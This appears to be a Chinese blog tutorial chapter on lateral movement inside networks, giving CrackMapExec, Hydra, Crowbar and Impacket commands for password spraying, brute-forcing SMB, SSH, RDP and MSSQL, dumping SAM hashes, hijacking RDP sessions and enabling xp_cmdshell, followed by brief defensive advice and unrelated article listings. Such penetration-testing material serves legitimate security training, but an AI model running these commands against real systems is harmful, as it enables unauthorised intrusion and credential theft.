news 2026/5/10 13:09:58

第二部分:内网渗透篇—— 横向移动

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
第二部分:内网渗透篇—— 横向移动

第三章:内网协议爆破

核心逻辑:拿到 WebShell 或 VPN 接入内网后,目标是快速识别存活主机提取凭证。本章重点在于效率隐蔽性的平衡,防止因高频爆破触发安全告警。


3.1 工具链配置

3.1.1 CrackMapExec (CME)

CME 是内网渗透的“瑞士军刀”,集扫描、爆破、执行于一体。

  • 安装:Kali 自带,或apt install crackmapexec

  • 核心概念:使用proto(协议)区分目标服务。

3.1.2 Impacket 工具集

专注于协议层面的攻击,特别是 SMB 和 RPC。

  • 核心工具

    • secretsdump.py:导出 SAM/LSA 哈希。

    • psexec.py:基于 SMB 的远程执行。

    • wmiexec.py:基于 WMI 的远程执行(更隐蔽)。


3.2 核心协议实战

3.2.1 SMB (445端口) —— 内网核心

场景:域环境、文件共享、Windows 主机。

攻击模式

命令示例

说明

密码喷射 (推荐)

cme smb 192.168.1.0/24 -u users.txt -p 'Password2026!' --no-brute

最安全。一个密码试全网,防锁定。

枚举共享

cme smb 192.168.1.10 -u 'guest' -p '' --shares

检查匿名访问和可写目录。

执行命令

cme smb 192.168.1.10 -u admin -p pass -x 'whoami'

验证权限,获取主机信息。

导出哈希

cme smb 192.168.1.10 -u admin -p pass --sam

获取本地用户 NTLM Hash。

📌 实战技巧

  • --no-brute参数:在域环境中务必添加,避免触发账户锁定策略(Account Lockout Policy)。

  • --continue-on-success:遇到成功的凭证继续尝试其他主机,不错过任何机会。

3.2.2 SSH (22端口) —— Linux/网络设备

场景:跳板机、Docker 宿主机、路由器。

工具

命令示例

说明

Hydra

hydra -L users.txt -P pass.txt ssh://192.168.1.10 -t 4 -w 30

-t 4限制线程,防止被 Ban。

CME

cme ssh 192.168.1.0/24 -u root -p pass.txt

批量验证弱口令。

📌 实战技巧

  • 私钥爆破:如果遇到禁止密码登录,尝试爆破私钥:hydra -l root -P /path/to/keys ssh://target

  • 已知漏洞:检查 OpenSSH 版本,利用CVE-2024-6387(RegreSSHion) 等 RCE 漏洞直接获取权限。

3.2.3 RDP (3389端口) —— 远程桌面

场景:运维终端、核心服务器。

痛点:Windows 10/11 默认开启 NLA,且极易触发锁定。

工具

命令示例

说明

Crowbar

crowbar -b rdp -s 192.168.1.10/32 -U users.txt -p pass.txt

对 RDP 支持比 Hydra 稳定。

CME

cme rdp 192.168.1.10 -u admin -p pass

验证凭据是否有效。

📌 实战技巧

  • Restricted Admin Mode:如果目标开启了该模式,可以使用 Hash 直接登录,无需明文密码。

  • 会话劫持:如果爆破出管理员密码,不要直接登录(会踢掉管理员),使用tscon劫持现有会话。

3.2.4 MSSQL (1433端口) —— 数据库渗透

场景:业务数据库、数据仓库。

操作

命令示例

说明

爆破登录

cme mssql 192.168.1.0/24 -u sa -p pass.txt

针对 SA 账户爆破。

执行命令

cme mssql 192.168.1.10 -u sa -p pass -x 'whoami'

验证数据库权限。

查询数据

cme mssql 192.168.1.10 -u sa -p pass --query "SELECT @@VERSION"

获取版本信息。

📌 实战技巧

  • xp_cmdshell:如果sa权限较高,开启xp_cmdshell直接获取系统 Shell。

  • 链接服务器:利用 MSSQL 的链接服务器(Linked Server)攻击其他数据库。


3.3 防御视角(给客户)

  1. 账户锁定策略

    • 设置“登录失败 5 次锁定 15 分钟”。

    • 建议:部署密码喷洒(Password Spraying)​ 检测规则,监控同一密码对大量账户的尝试。

  2. 网络隔离

    • 禁止全网互访 445 端口。

    • 管理端口(22, 3389)仅允许跳板机访问。

  3. 日志监控

    • Event ID 4625:登录失败。

    • Event ID 4648:显式凭据登录(攻击者常用)。

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/5/10 13:06:34

构建高性能游戏服务器网关:从原理到实践

1. 项目概述:一个面向游戏服务器的现代化网关解决方案如果你和我一样,在游戏服务器运维或者后端开发领域摸爬滚打多年,那么对“网关”这个词一定不会陌生。它就像是服务器集群的“门卫”和“交通警察”,负责处理所有进出的流量&am…

作者头像 李华
网站建设 2026/5/10 13:06:02

北航毕业论文LaTeX模板终极指南:快速搞定格式规范

北航毕业论文LaTeX模板终极指南:快速搞定格式规范 【免费下载链接】BUAAthesis 北航毕设论文LaTeX模板 项目地址: https://gitcode.com/gh_mirrors/bu/BUAAthesis 还在为北航毕业论文格式要求烦恼吗?手动调整页眉页脚、参考文献编号、目录格式&am…

作者头像 李华
网站建设 2026/5/10 13:04:04

为OpenClaw智能体构建持久化操作记忆:TotalReClaw插件实战指南

1. 项目概述:为OpenClaw智能体构建持久化操作记忆如果你和我一样,长期在服务器运维、应用部署或故障排查这类重复性操作中打转,一定有过这样的体验:面对一个似曾相识的报错,隐约记得上次好像解决了,但具体怎…

作者头像 李华
网站建设 2026/5/10 13:03:56

免费获取Poppins几何无衬线字体:9种字重+多语言支持的完整指南

免费获取Poppins几何无衬线字体:9种字重多语言支持的完整指南 【免费下载链接】Poppins Poppins, a Devanagari Latin family for Google Fonts. 项目地址: https://gitcode.com/gh_mirrors/po/Poppins 还在为寻找一款既专业又免费的高品质字体而烦恼吗&…

作者头像 李华
网站建设 2026/5/10 13:00:51

Excel数据检索革命:5分钟搞定100个文件的批量查询神器

Excel数据检索革命:5分钟搞定100个文件的批量查询神器 【免费下载链接】QueryExcel 多Excel文件内容查询工具。 项目地址: https://gitcode.com/gh_mirrors/qu/QueryExcel 还在为海量Excel文件中的信息查找而头痛吗?每天面对数十甚至上百个电子表…

作者头像 李华
网站建设 2026/5/10 12:46:57

终极指南:如何用RPFM革命性工具高效开发全面战争模组

终极指南:如何用RPFM革命性工具高效开发全面战争模组 【免费下载链接】rpfm Rusted PackFile Manager (RPFM) is a... reimplementation in Rust and Qt6 of PackFile Manager (PFM), one of the best modding tools for Total War Games. 项目地址: https://gitc…

作者头像 李华